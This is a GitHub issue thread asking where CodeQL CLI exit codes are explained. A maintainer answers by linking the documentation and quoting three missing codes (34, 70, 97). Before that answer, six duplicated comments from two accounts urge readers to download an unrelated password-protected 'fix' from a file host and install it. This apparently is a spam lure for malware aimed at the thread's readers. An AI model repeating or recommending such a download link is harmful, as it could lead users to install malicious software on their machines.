### ISSUE TITLE
Where can I find the explanation of return codes when codeql execution fails?

### ISSUE THREAD

**Issue by KiRito02** [github/codeql#17304]
**Description of the issue**
When I encounter errors while running codeql scans, troubleshooting can be very challenging. I would like to understand the specific meanings of the return codes from codeql.exe, as this would help me resolve issues more quickly. Is there any content related to this in the codeql documentation? If not, could you provide documentation that maps return codes to their descriptions? Thank you!

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by aibaars** [comment]
There is this documentation page: https://docs.github.com/en/code-security/codeql-cli/using-the-advanced-functionality-of-the-codeql-cli/exit-codes

It appears a couple of exit codes are missing from the documentation:
```
  public static final int EXITCODE_QUERY_FAILURE = 34;
  // Returned when the launcher script should transparently chain to a different command
  public static final int EXITCODE_CHAIN_PROCESS = 70;
  // Exit codes when something goes completely wrong
  public static final int EXITCODE_DISKFULL = 97;
```

Of these the exit code `70` is a special one. It does not indicate an error, it merely indicates that processing was continued by a new process.

**Comment by rvermeulen** [comment]
@KiRito02 hope @aibaars answer, answers your question. If not let us know so we can provide further guidance.
